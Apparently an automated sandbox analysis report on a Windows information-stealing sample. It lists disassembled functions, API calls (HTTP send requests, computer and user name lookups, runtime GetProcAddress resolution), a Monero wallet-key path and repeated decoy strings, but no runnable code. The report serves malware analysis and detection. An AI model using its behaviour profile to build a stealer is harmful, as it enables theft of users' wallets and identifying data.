                              • Instruction Fuzzy Hash: 81A14DB55302409FD364EFA9EE88B6E37F9F74CB01704452AE605C3AA4D7399843CB56
                              Function 009E45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 677 9e45c0-9e4695 RtlAllocateHeap 694 9e46a0-9e46a6 677->694 695 9e474f-9e47a9 VirtualProtect 694->695 696 9e46ac-9e474a 694->696 696->694
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 009E479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46CD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 6402300b1463d57aa5d22bfa8fc1af7d920cf07901525b4f1c5b4a5ad3e12f5b
                              • Instruction ID: 5418dff17df9f47667cc2617da75dc9b7091bf5e2001fe49b3207f2f75b75bc0
                              • Opcode Fuzzy Hash: 6402300b1463d57aa5d22bfa8fc1af7d920cf07901525b4f1c5b4a5ad3e12f5b
                              • Instruction Fuzzy Hash: 9A410260FD37087BC63CFFB4B87EADEB65F6F56B00F405880AC68522C0EAA0550449B2
                              Function 009E4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 9e4880-9e4942 call 9fa7a0 call 9e47b0 call 9fa740 * 5 InternetOpenA StrCmpCA 816 9e494b-9e494f 801->816 817 9e4944 801->817 818 9e4ecb-9e4ef3 InternetCloseHandle call 9faad0 call 9e9ac0 816->818 819 9e4955-9e4acd call 9f8b60 call 9fa920 call 9fa8a0 call 9fa800 * 2 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa920 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa920 call 9fa8a0 call 9fa800 * 2 InternetConnectA 816->819 817->816 829 9e4ef5-9e4f2d call 9fa820 call 9fa9b0 call 9fa8a0 call 9fa800 818->829 830 9e4f32-9e4fa2 call 9f8990 * 2 call 9fa7a0 call 9fa800 * 8 818->830 819->818 905 9e4ad3-9e4ad7 819->905 829->830 906 9e4ad9-9e4ae3 905->906 907 9e4ae5 905->907 908 9e4aef-9e4b22 HttpOpenRequestA 906->908 907->908 909 9e4ebe-9e4ec5 InternetCloseHandle 908->909 910 9e4b28-9e4e28 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa920 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa920 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa920 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa9b0 call 9fa8a0 call 9fa800 call 9fa920 call 9fa8a0 call 9fa800 call 9fa740 call 9fa920 * 2 call 9fa8a0 call 9fa800 * 2 call 9faad0 lstrlen call 9faad0 * 2 lstrlen call 9faad0 HttpSendRequestA 908->910 909->818 1021 9e4e32-9e4e5c InternetReadFile 910->1021 1022 9e4e5e-9e4e65 1021->1022 1023 9e4e67-9e4eb9 InternetCloseHandle call 9fa800 1021->1023 1022->1023 1024 9e4e69-9e4ea7 call 9fa9b0 call 9fa8a0 call 9fa800 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009E4915
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A00DDB,00000000,?,?,00000000,?,",00000000,?,013BE390), ref: 009E4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009E4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009E4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009E4E49
                              • InternetCloseHandle.WININET(00000000), ref: 009E4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 009E4EC5
                              • HttpOpenRequestA.WININET(00000000,013BE290,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E4B15
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • InternetCloseHandle.WININET(00000000), ref: 009E4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 884a066a2e1216c3d959502750a4d89af2d08ee6cc057d162f79da0721110544
                              • Instruction ID: 2b61944dc41a99aa4ef521e17bd3dadaf422672bed461bd154bffb10d5402539
                              • Opcode Fuzzy Hash: 884a066a2e1216c3d959502750a4d89af2d08ee6cc057d162f79da0721110544
                              • Instruction Fuzzy Hash: 2A12CFB191011CAADB15EB90DC92FFEB379BF94340F5041A9B20A62491DFB06F49CF66
                              Function 009F78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 009F792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: cc40a50fa86c2d15ac247ede932d7c1c682a6ae2d9d20852759d2a38264d0e9f
                              • Instruction ID: 59080d35c3fb3f9207621ab8b2ef6a40bd03d5f523f8bc3764830403b37d095d
                              • Opcode Fuzzy Hash: cc40a50fa86c2d15ac247ede932d7c1c682a6ae2d9d20852759d2a38264d0e9f
                              • Instruction Fuzzy Hash: C20181B1A04209EBC710DF98DD45FAEFBB8FB04B65F10421AFA45E36C0C77859408BA1
                              Function 009F7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009E11B7), ref: 009F7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 009F789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 99d350906a341d19758e8d3dd4c5cc2cf0a413204e18b3aaa5144949364209a6
                              • Instruction ID: bff03a5a25dbb242046f8e00f15d1cf58283692ae8ddae3c7530e143c20c6835
                              • Opcode Fuzzy Hash: 99d350906a341d19758e8d3dd4c5cc2cf0a413204e18b3aaa5144949364209a6
                              • Instruction Fuzzy Hash: 89F04FB1944208ABC714DF98DD49FAEFBB8EB04B11F10066AFA05A2680C77815058BA1
                              Function 009E1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: c0a0cdc068416041e043b73d888c82198321f1e17b491d90ced5fad3d0a10977
                              • Instruction ID: 357cf1eb6874b1e7e2367cf6b836ae905b301dfd2fbf5755ea3ba40ba410a605
                              • Opcode Fuzzy Hash: c0a0cdc068416041e043b73d888c82198321f1e17b491d90ced5fad3d0a10977
                              • Instruction Fuzzy Hash: C4D05E7490430CDBCB10DFE0DC497EDBB78FB0C711F000555D90562740EA305882CAAA
                              Function 009F9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 9f9c10-9f9c1a 634 9fa036-9fa0ca LoadLibraryA * 8 633->634 635 9f9c20-9fa031 GetProcAddress * 43 633->635 636 9fa0cc-9fa141 GetProcAddress * 5 634->636 637 9fa146-9fa14d 634->637 635->634 636->637 638 9fa216-9fa21d 637->638 639 9fa153-9fa211 GetProcAddress * 8 637->639 640 9fa21f-9fa293 GetProcAddress * 5 638->640 641 9fa298-9fa29f 638->641 639->638 640->641 642 9fa337-9fa33e 641->642 643 9fa2a5-9fa332 GetProcAddress * 6 641->643 644 9fa41f-9fa426 642->644 645 9fa344-9fa41a GetProcAddress * 9 642->645 643->642 646 9fa428-9fa49d GetProcAddress * 5 644->646 647 9fa4a2-9fa4a9 644->647 645->644 646->647 648 9fa4dc-9fa4e3 647->648 649 9fa4ab-9fa4d7 GetProcAddress * 2 647->649 650 9fa515-9fa51c 648->650 651 9fa4e5-9fa510 GetProcAddress * 2 648->651 649->648 652 9fa612-9fa619 650->652 653 9fa522-9fa60d GetProcAddress * 10 650->653 651->650 654 9fa67d-9fa684 652->654 655 9fa61b-9fa678 GetProcAddress * 4 652->655 653->652 656 9fa69e-9fa6a5 654->656 657 9fa686-9fa699 GetProcAddress 654->657 655->654 658 9fa708-9fa709 656->658 659 9fa6a7-9fa703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(75900000,013A64C0), ref: 009F9C2D
                              • GetProcAddress.KERNEL32(75900000,013A6640), ref: 009F9C45
                              • GetProcAddress.KERNEL32(75900000,013B8F10), ref: 009F9C5E
                              • GetProcAddress.KERNEL32(75900000,013B8FB8), ref: 009F9C76
                              • GetProcAddress.KERNEL32(75900000,013BCB80), ref: 009F9C8E
                              • GetProcAddress.KERNEL32(75900000,013BCCE8), ref: 009F9CA7
                              • GetProcAddress.KERNEL32(75900000,013AB2E8), ref: 009F9CBF
                              • GetProcAddress.KERNEL32(75900000,013BCB08), ref: 009F9CD7
                              • GetProcAddress.KERNEL32(75900000,013BCD90), ref: 009F9CF0
                              • GetProcAddress.KERNEL32(75900000,013BCDC0), ref: 009F9D08
                              • GetProcAddress.KERNEL32(75900000,013BCDA8), ref: 009F9D20
                              • GetProcAddress.KERNEL32(75900000,013A63C0), ref: 009F9D39
                              • GetProcAddress.KERNEL32(75900000,013A63E0), ref: 009F9D51
                              • GetProcAddress.KERNEL32(75900000,013A6480), ref: 009F9D69
                              • GetProcAddress.KERNEL32(75900000,013A64A0), ref: 009F9D82
                              • GetProcAddress.KERNEL32(75900000,013BCBB0), ref: 009F9D9A
                              • GetProcAddress.KERNEL32(75900000,013BCB98), ref: 009F9DB2
                              • GetProcAddress.KERNEL32(75900000,013AB130), ref: 009F9DCB
                              • GetProcAddress.KERNEL32(75900000,013A6520), ref: 009F9DE3
                              • GetProcAddress.KERNEL32(75900000,013BCB20), ref: 009F9DFB
                              • GetProcAddress.KERNEL32(75900000,013BCD18), ref: 009F9E14
                              • GetProcAddress.KERNEL32(75900000,013BCC40), ref: 009F9E2C
                              • GetProcAddress.KERNEL32(75900000,013BCC70), ref: 009F9E44
                              • GetProcAddress.KERNEL32(75900000,013A6560), ref: 009F9E5D
                              • GetProcAddress.KERNEL32(75900000,013BCBE0), ref: 009F9E75
                              • GetProcAddress.KERNEL32(75900000,013BCBF8), ref: 009F9E8D
